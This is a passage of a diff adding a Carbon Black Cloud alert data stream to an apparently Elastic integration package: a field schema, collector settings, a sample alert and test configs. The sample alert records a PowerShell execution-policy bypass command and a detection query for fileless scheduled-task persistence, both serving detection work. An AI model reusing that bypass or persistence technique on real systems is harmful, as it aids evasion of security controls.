type: group + fields: + - name: category + type: keyword + description: The category of the alert. + - name: version + type: keyword + description: The version of the schema being emitted. + - name: url + type: keyword + description: Link to the alerts page for this alert. Does not vary by alert type. + - name: backend_timestamp + type: date + description: Timestamp when the alert was first detected by the Carbon Black Cloud backend, it is a ISO 8601 UTC timestamp. + - name: backend_update_timestamp + type: date + description: The last time the alert was updated in Carbon Black Cloud, it is a ISO 8601 UTC timestamp. + - name: user_update_timestamp + type: date + description: Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination, it is a ISO 8601 UTC timestamp. + - name: additional_events_present + type: boolean + description: Indicator to let API and forwarder users know that they should look up other associated events related to this alert. + - name: alert_notes_present + type: boolean + description: Indicates if notes are associated with the alert. + - name: threat_notes_present + type: boolean + description: Indicates if notes are associated with the threat_id. + - name: organization_key + type: keyword + description: The unique identifier for the organization associated with the alert. + - name: org_feature_entitlement + type: keyword + description: The feature entitlement of the organization. + - name: policy_applied + type: keyword + description: Whether a policy was applied. + - name: product_id + type: keyword + description: The hexadecimal id of the USB device's product. + - name: product_name + type: keyword + description: The name of the USB device's vendor. + - name: reason + type: keyword + description: A spoken language written explanation of the what and why the alert occurred and any action taken. + - name: reason_code + type: keyword + description: Shorthand enum for the full-text reason. + - name: run_state + type: keyword + description: Whether the threat in the alert ran. + - name: sensor_action + type: keyword + description: The action taken by the sensor, according to the rule of the policy. + - name: serial_number + type: keyword + description: The serial number of the USB device. + - name: status + type: keyword + description: status of alert. + - name: tags + type: keyword + description: Tags associated with the alert. + - name: primary_event_id + type: keyword + description: ID of the primary event in the alert. + - name: threat_id + type: keyword + description: The identifier of a threat which this alert belongs. Threats are comprised of a combination of factors that can be repeated across devices. + - name: threat_name + type: keyword + description: Name of the threat. + - name: threat_category + type: keyword + description: Categories of threats which we were able to take action on. + - name: type + type: keyword + description: Type of alert. + - name: vendor_id + type: keyword + description: The hexadecimal id of the USB device's vendor. + - name: vendor_name + type: keyword + description: The name of the USB device's vendor. + - name: ttps + type: keyword + description: Other potential malicious activities involved in a threat. + - name: is_updated + type: boolean + description: Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. + - name: attack_tactic + type: keyword + description: S tactic from the MITRE ATT&CK framework. + - name: attack_technique + type: keyword + description: Technique from the MITRE ATT&CK framework. + # ml_classification fields + - name: ml_classification_final_verdict + type: keyword + description: Final verdict of the alert, based on the ML models that were used to make the prediction. + - name: ml_classification_global_prevalence + type: keyword + description: Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations. + - name: ml_classification_org_prevalence + type: keyword + description: TCategories (low/medium/high) used to describe the prevalence of alerts within an organization. + - name: ml_classification_anomalies + type: keyword + description: An list of anomalies detected by the machine learning classification. + # rule fields + - name: rule_id + type: keyword + description: ID of the rule that triggered an alert. + - name: rule_category_id + type: keyword + description: ID representing the category of the rule_id for certain alert types. + - name: rule_config_id + type: keyword + description: ID of the rule configuration that triggered an alert. + - name: rule_config_name + type: keyword + description: Name of the rule configuration that triggered an alert. + - name: rule_config_type + type: keyword + description: Type of the rule configuration that triggered an alert. + - name: tms_rule_id + type: keyword + description: Threat intrusion detection id. + # container runtime fields + - name: k8s_cluster + type: keyword + description: The Kubernetes cluster associated with the event. + - name: k8s_namespace + type: keyword + description: The Kubernetes namespace associated with the event. + - name: k8s_kind + type: keyword + description: The type of Kubernetes resource associated with the event (e.g., Pod, DaemonSet). + - name: k8s_workload_name + type: keyword + description: The name of the Kubernetes workload associated with the event. + - name: k8s_pod_name + type: keyword + description: The name of the Kubernetes pod associated with the event. + - name: k8s_policy_id + type: keyword + description: The unique identifier of the Kubernetes policy associated with the event. + - name: k8s_policy + type: keyword + description: The name of the Kubernetes policy associated with the event. + - name: k8s_rule_id + type: keyword + description: The unique identifier of the Kubernetes rule associated with the event. + - name: k8s_rule + type: keyword + description: The name of the Kubernetes rule associated with the event. + - name: connection_type + type: keyword + description: The type of network connection (e.g., EGRESS, INGRESS). + - name: egress_group_id + type: keyword + description: The unique identifier of the egress group associated with the event. + - name: egress_group_name + type: keyword + description: The name of the egress group associated with the event. + - name: ip_reputation + type: integer + description: The reputation score of the IP address associated with the event. + - name: remote_is_private + type: boolean + description: Indicates whether the remote IP address is private or not. + # device fields + - name: device + type: group + fields: + - name: location + type: keyword + description: Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix. + - name: os + type: keyword + description: OS of the device. + - name: policy_id + type: integer + description: The identifier for the device policy associated with the device at the time of the alert. + - name: policy + type: keyword + description: The name of the device policy associated with the device at the time of the alert. + - name: target_value + type: keyword + description: Target value assigned to the device, set from the policy. + - name: external_ip + type: keyword + description: IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT. + - name: internal_ip + type: keyword + description: IP address of the endpoint reported by the sensor. + - name: uem_id + type: keyword + description: Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function. + # ioc fields + - name: ioc + type: group + fields: + - name: field + type: keyword + description: The field the indicator of comprise (IOC) hit contains. + - name: hit + type: keyword + description: IOC field value or IOC query that matches. + - name: id + type: keyword + description: The identifier of the IOC that cause the hit. + # report fields + - name: report + type: group + fields: + - name: id + type: keyword + description: The identifier of the report that contains the IOC. + - name: name + type: keyword + description: The name of the report that contains the IOC. + - name: description + type: keyword + description: Description of the IOC report associated with the alert. + - name: link + type: keyword + description: Link of reports that contained the IOC that caused a hit. + - name: tags + type: keyword + description: Tags associated with the IOC report. + # parent process fields + - name: parent + type: group + description: Fields related to the parent information. + fields: + - name: hash + type: group + description: Hash values associated with the parent process. + fields: + - name: sha256 + type: keyword + description: SHA-256 hash of the parent process. + - name: md5 + type: keyword + description: MD5 hash of the parent process. + - name: pid + type: long + description: PID of the parent process that has fired the alert. + - name: guid + type: keyword + description: Guid of the parent process that has fired the alert. + - name: name + type: keyword + description: Filesystem path of the parent process binary. + - name: cmdline + type: keyword + description: Command line executed by the parent process. + - name: username + type: keyword + description: User context in which the parent process was executed. + - name: effective_reputation + type: keyword + description: Effective reputation of the parent hash. + - name: reputation + type: keyword + description: Reputation of the parent process; applied when event is processed by the Carbon Black Cloud. + # process fields + - name: process + type: group + description: Fields related to the actor process information. + fields: + - name: hash + type: group + description: Hash values associated with the process. + fields: + - name: sha256 + type: keyword + description: SHA-256 hash of the process. + - name: md5 + type: keyword + description: MD5 hash of the process. + - name: pid + type: long + description: PID of the process that has fired the alert. + - name: guid + type: keyword + description: Guid of the process that has fired the alert. + - name: name + type: keyword + description: Filesystem path of the actor process binary. + - name: cmdline + type: keyword + description: Command line executed by the actor process. + - name: username + type: keyword + description: User context in which the actor process was executed. + - name: effective_reputation + type: keyword + description: Effective reputation of the actor hash. + - name: reputation + type: keyword + description: Reputation of the actor process; applied when event is processed by the Carbon Black Cloud. + - name: issuer + type: keyword + description: The certificate authority associated with the process's certificate. + - name: publisher + type: keyword + description: Publisher name on the certificate used to sign the Windows or macOS process binary. + # child process fields + - name: childproc + type: group + description: Fields related to the child process information. + fields: + - name: hash + type: group + description: Hash values associated with the child process. + fields: + - name: sha256 + type: keyword + description: SHA-256 hash of the child process. + - name: md5 + type: keyword + description: MD5 hash of the child process. + - name: guid + type: keyword + description: Guid of the child process that has fired the alert. + - name: name + type: keyword + description: Filesystem path of the child process binary. + - name: cmdline + type: keyword + description: Command line executed by the child process. + - name: username + type: keyword + description: User context in which the child process was executed. + - name: effective_reputation + type: keyword + description: Effective reputation of the child process hash. + # blocked process fields + - name: blocked_process + type: group + description: Fields related to the blocked process information. + fields: + - name: hash + type: group + description: Hash values associated with the child process. + fields: + - name: sha256 + type: keyword + description: SHA-256 hash of the child process binary; for any process terminated by the sensor. + - name: md5 + type: keyword + description: MD5 hash of the child process binary; for any process terminated by the sensor. + - name: name + type: keyword + description: Tokenized file path of the files blocked by sensor action. + - name: effective_reputation + type: keyword + description: Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred. + # watchlist fields + - name: watchlists + type: group + description: List of watchlists associated with an alert. + fields: + - name: id + type: keyword + description: Identifier of the watchlist. + - name: name + type: keyword + description: Name of the watchlist. + # determination fields + - name: determination + type: group + description: Fields related to alert determination + fields: + - name: change_timestamp + type: date + description: Timestamp of the determination change + - name: value + type: keyword + description: Value of the determination + - name: changed_by_type + type: keyword + description: Type of entity that changed the determination + - name: changed_by + type: keyword + description: Entity that changed the determination + # workflow fields + - name: workflow + type: group + description: Tracking system for alerts as they are triaged and resolved. + fields: + - name: changed_by + type: keyword + description: The name of process which changed the workflow. + - name: changed_by_type + type: keyword + description: The type of user who changed the workflow. + - name: changed_by_autoclose_rule_id + type: keyword + description: The rule id that auto closed the workflow. + - name: change_timestamp + type: date + description: The last change/update time of workflow. + - name: closure_reason + type: keyword + description: Reason for which the workflow was closed. + - name: status + type: keyword + description: The status of the workflow. + # mdr fields + - name: mdr + type: group + description: Fields related to MDR. + fields: + - name: alert + type: boolean + description: Is the alert eligible for review by Carbon Black MDR Analysts. + - name: alert_notes_present + type: boolean + description: Customer visible notes at the alert level that were added by a MDR analyst. + - name: threat_notes_present + type: boolean + description: Customer visible notes at the threat level that were added by a MDR analyst. + - name: determination + type: group + description: MDR updatable classification of the alert. + fields: + - name: change_timestamp + type: date + description: When the last MDR classification change occurred, it is a ISO 8601 UTC timestamp. + - name: value + type: keyword + description: A record that identifies the whether the alert was determined to represent a likely or unlikely threat. + - name: workflow + type: group + description: MDR-updatable workflow of the alert. + fields: + - name: change_timestamp + type: date + description: WWhen the last MDR status change occurred, it is a ISO 8601 UTC timestamp. + - name: is_assigned + type: boolean + description: If the workflow is assigned or not. + - name: status + type: boolean + description: Primary value used to capture status change during MD Analyst's alert triage. + - name: classification + type: group + description: MDR-updatable classification of the alert. + fields: + - name: change_timestamp + type: date + description: WWhen the last MDR classification change occurred, it is a ISO 8601 UTC timestamp. + # network connection fields + - name: netconn + type: group + description: Fields related to network connections + fields: + - name: remote_port + type: integer + description: TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port. + - name: local_port + type: integer + description: TCP or UDP port used by the local side of the network connection. + - name: protocol + type: keyword + description: Network protocol of the network connection. + - name: remote_domain + type: keyword + description: Domain name (FQDN) associated with the remote end of the network connection. + - name: remote_ip + type: ip + description: IP address of the remote side of the network connection. + - name: local_ip + type: ip + description: IP address of the local side of the network connection. + - name: remote_ipv4 + type: ip + description: IPv4 address of the remote side of the network connection. + - name: local_ipv4 + type: ip + description: IPv4 address of the local side of the network connection. + - name: remote_ipv6 + type: ip + description: IPv6 address of the remote side of the network connection. + - name: local_ipv6 + type: ip + description: IPv6 address of the local side of the network connection. diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/manifest.yml b/packages/carbon_black_cloud/data_stream/alert_v7/manifest.yml new file mode 100644 index 00000000000..d3aea7ba490 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/manifest.yml @@ -0,0 +1,152 @@ +title: Alert V7 +type: logs +streams: + - input: cel + title: Collect alerts from Carbon Black Cloud using v7 API + description: Collect alerts from Carbon Black Cloud. + template_path: cel.yml.hbs + vars: + - name: interval + type: text + title: Interval + description: Interval to fetch alerts from Carbon Black Cloud. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1m + - name: initial_interval + type: text + title: Initial Interval + description: How far back to pull the alerts from the Carbon Black Cloud API. Supported units for this parameter are h/m/s. + default: 24h + multi: false + required: true + show_user: true + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: true + default: 2m + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - carbon_black_cloud-alert + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - input: aws-s3 + title: Collect alerts from Carbon Black Cloud - Data Forwarder 2.0 Schema [Beta] + description: Collect alerts from Carbon Black Cloud. + template_path: aws-s3.yml.hbs + vars: + - name: queue_url_alert + type: text + title: "[Alert][SQS] Queue URL" + multi: false + required: false + show_user: true + description: |- + URL of the AWS SQS queue that messages will be received from. This is only required if you want to collect logs via AWS SQS. + This is an alert data stream specific queue URL. This will override the global queue URL if provided. + - name: bucket_list_prefix + type: text + title: "[S3] Bucket Prefix" + multi: false + required: false + show_user: true + default: alert_logs_v7 + description: Prefix to apply for the list request to the S3 bucket. + - name: interval + type: text + title: "[S3] Interval" + multi: false + required: false + show_user: true + default: 1m + description: Time interval for polling listing of the S3 bucket. Supported units for this parameter are h/m/s. + - name: number_of_workers + type: integer + title: "[S3] Number of Workers" + multi: false + required: false + show_user: true + default: 5 + description: Number of workers that will process the S3 objects listed. + - name: visibility_timeout + type: text + title: "[SQS] Visibility Timeout" + multi: false + required: false + show_user: true + default: 300s + description: The duration that the received messages are hidden from subsequent retrieve requests after being retrieved by a ReceiveMessage request. The maximum is 12 hours. Supported units for this parameter are h/m/s. + - name: api_timeout + type: text + title: "[SQS] API Timeout" + multi: false + required: false + show_user: true + default: 120s + description: The maximum duration of AWS API can take. The maximum is half of the visibility timeout value. Supported units for this parameter are h/m/s. + - name: max_number_of_messages + type: integer + title: "[SQS] Maximum Concurrent SQS Messages" + required: false + show_user: true + default: 5 + description: The maximum number of SQS messages that can be inflight at any time. + - name: file_selectors + type: yaml + title: "[SQS] File Selectors" + multi: false + required: false + show_user: false + default: | + # - regex: "alert_logs/" + description: "If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. \nThis is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. \nIf file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. \nRegexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed.\n[NOTE]: It is recommended to use data stream specific SQS queues instead of file_selectors to avoid data loss." + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - carbon_black_cloud-alert + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/sample_event.json b/packages/carbon_black_cloud/data_stream/alert_v7/sample_event.json new file mode 100644 index 00000000000..0297d2ffdd8 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/sample_event.json @@ -0,0 +1,200 @@ +{ + "@timestamp": "2024-03-13T08:02:36.578Z", + "agent": { + "ephemeral_id": "9c46ff77-c269-4593-a3d8-efd89fbdca66", + "id": "db2930ff-774e-4541-bcd4-1a6a1d656167", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2024-03-13T08:03:29.540Z", + "backend_update_timestamp": "2024-03-13T08:03:29.540Z", + "category": "THREAT", + "determination": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "value": "NONE" + }, + "device": { + "external_ip": "75.98.230.194", + "internal_ip": "172.16.100.140", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "default", + "policy_id": 6525, + "target_value": "MEDIUM" + }, + "ioc": { + "hit": "(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))", + "id": "d1080521-e617-4e45-94e0-7a145c62c90a" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "ml_classification_final_verdict": "NOT_ANOMALOUS", + "ml_classification_global_prevalence": "LOW", + "ml_classification_org_prevalence": "LOW", + "organization_key": "7DESJ9GN", + "parent": { + "cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "c:\\windows\\system32\\svchost.exe", + "pid": 1916, + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "re9M9hp8TbGLqyk6QXqQqA-0", + "process": { + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 5172, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "reason_code": "c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d", + "report": { + "description": "Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.", + "id": "LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a", + "link": "https://attack.mitre.org/techniques/T1053/", + "name": "Execution - AMSI - New Fileless Scheduled Task Behavior Detected", + "tags": [ + "execution", + "privesc", + "persistence", + "t1053", + "windows", + "amsi", + "attack", + "attackframework" + ] + }, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "C21CA826573A8D974C1E93C8471AAB7F", + "threat_notes_present": false, + "type": "WATCHLIST", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN", + "watchlists": [ + { + "id": "Ci7w5B4URg6HN60hatQMQ", + "name": "AMSI Threat Intelligence" + } + ], + "workflow": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "data_stream": { + "dataset": "carbon_black_cloud.alert_v7", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "db2930ff-774e-4541-bcd4-1a6a1d656167", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "agent_id_status": "verified", + "dataset": "carbon_black_cloud.alert_v7", + "end": "2024-03-13T08:00:09.894Z", + "id": "1c6aba68-24cc-41e3-ad8e-4b545a587b55", + "ingested": "2024-04-10T09:06:02Z", + "kind": "alert", + "original": "{\"alert_notes_present\":false,\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55\\u0026orgKey=7DESJ9GN\",\"asset_group\":[],\"backend_timestamp\":\"2024-03-13T08:03:29.540Z\",\"backend_update_timestamp\":\"2024-03-13T08:03:29.540Z\",\"childproc_cmdline\":\"\",\"childproc_guid\":\"\",\"childproc_username\":\"\",\"detection_timestamp\":\"2024-03-13T08:02:36.578Z\",\"determination\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by\":\"ALERT_CREATION\",\"changed_by_type\":\"SYSTEM\",\"value\":\"NONE\"},\"device_external_ip\":\"75.98.230.194\",\"device_id\":6612391,\"device_internal_ip\":\"172.16.100.140\",\"device_location\":\"UNKNOWN\",\"device_name\":\"EIP\\\\WW-20002\",\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 10 x64\",\"device_policy\":\"default\",\"device_policy_id\":6525,\"device_target_value\":\"MEDIUM\",\"device_uem_id\":\"\",\"device_username\":\"EIP\\\\Administrator\",\"first_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"id\":\"1c6aba68-24cc-41e3-ad8e-4b545a587b55\",\"ioc_hit\":\"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\\\\\ccm\\\\\\\\systemtemp OR crossproc_name:windows\\\\\\\\ccm\\\\\\\\ccmexec.exe OR (process_publisher:\\\"VMware, Inc.\\\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))\",\"ioc_id\":\"d1080521-e617-4e45-94e0-7a145c62c90a\",\"is_updated\":false,\"last_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"ml_classification_anomalies\":[],\"ml_classification_final_verdict\":\"NOT_ANOMALOUS\",\"ml_classification_global_prevalence\":\"LOW\",\"ml_classification_org_prevalence\":\"LOW\",\"org_key\":\"7DESJ9GN\",\"parent_cmdline\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_guid\":\"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275\",\"parent_md5\":\"145dcf6706eeea5b066885ee17964c09\",\"parent_name\":\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"parent_pid\":1916,\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_sha256\":\"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3\",\"parent_username\":\"NT AUTHORITY\\\\SYSTEM\",\"policy_applied\":\"NOT_APPLIED\",\"primary_event_id\":\"re9M9hp8TbGLqyk6QXqQqA-0\",\"process_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -EP Bypass \\\\\\\\eip.demo\\\\sysvol\\\\EIP.DEMO\\\\scripts\\\\Luminol.ps1\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_guid\":\"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_md5\":\"2e5a8590cf6848968fc23de3fa1e25f1\",\"process_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"process_pid\":5172,\"process_publisher\":[\"Microsoft Windows\"],\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_sha256\":\"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"reason\":\"Process powershell.exe was detected by the report \\\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\\\" in watchlist \\\"AMSI Threat Intelligence\\\"\",\"reason_code\":\"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d\",\"report_description\":\"Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.\",\"report_id\":\"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a\",\"report_link\":\"https://attack.mitre.org/techniques/T1053/\",\"report_name\":\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\",\"report_tags\":[\"execution\",\"privesc\",\"persistence\",\"t1053\",\"windows\",\"amsi\",\"attack\",\"attackframework\"],\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"severity\":5,\"tags\":null,\"threat_id\":\"C21CA826573A8D974C1E93C8471AAB7F\",\"threat_notes_present\":false,\"type\":\"WATCHLIST\",\"user_update_timestamp\":null,\"watchlists\":[{\"id\":\"Ci7w5B4URg6HN60hatQMQ\",\"name\":\"AMSI Threat Intelligence\"}],\"workflow\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by\":\"ALERT_CREATION\",\"changed_by_type\":\"SYSTEM\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"}}", + "reason": "Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"", + "severity": 5, + "start": "2024-03-13T08:00:09.894Z" + }, + "host": { + "hostname": "WW-20002", + "id": "6612391", + "name": "WW-20002", + "os": { + "type": "windows", + "version": "Windows 10 x64" + } + }, + "input": { + "type": "cel" + }, + "process": { + "command_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "entity_id": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "name": "powershell.exe", + "parent": { + "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "entity_id": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "executable": "c:\\windows\\system32\\svchost.exe", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "svchost.exe", + "pid": 1916 + }, + "pid": 5172 + }, + "related": { + "hash": [ + "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3", + "145dcf6706eeea5b066885ee17964c09", + "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3", + "2e5a8590cf6848968fc23de3fa1e25f1" + ], + "hosts": [ + "WW-20002", + "EIP" + ], + "user": [ + "Administrator" + ] + }, + "tags": [ + "preserve_original_event", + "forwarded", + "carbon_black_cloud-alert" + ], + "user": { + "domain": "EIP", + "name": "Administrator" + } +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-cel-config.yml b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-cel-config.yml new file mode 100644 index 00000000000..ff03928cbb3 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-cel-config.yml @@ -0,0 +1,11 @@ +input: cel +service: carbon_black_cloud +vars: + hostname: http://{{Hostname}}:{{Port}} + org_key: xxxx + custom_api_id: xxxx + custom_api_secret_key: xxxx +data_stream: + vars: + preserve_original_event: true + enable_request_tracer: true diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-default-config.yml b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-httpjson-config.yml similarity index 100% rename from packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-default-config.yml rename to packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-httpjson-config.yml diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/cel.yml.hbs b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/cel.yml.hbs new file mode 100644 index 00000000000..9494a994cbe --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/cel.yml.hbs @@ -0,0 +1,61 @@ +config_version: 2 +interval: {{interval}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +resource.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url }} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +resource.url: {{hostname}}/vulnerability/assessment/api/v1/orgs/{{org_key}}/devices/vulnerabilities/summary/_search +state: + api_key: '{{custom_api_secret_key}}/{{custom_api_id}}' + want_more: false +redact: + fields: + - api_key +program: | + request("POST", state.url).with({ + "Header":{ + "Content-Type": ["application/json"], + "X-Auth-Token": [state.api_key], + }, + "Body":{ + "start": 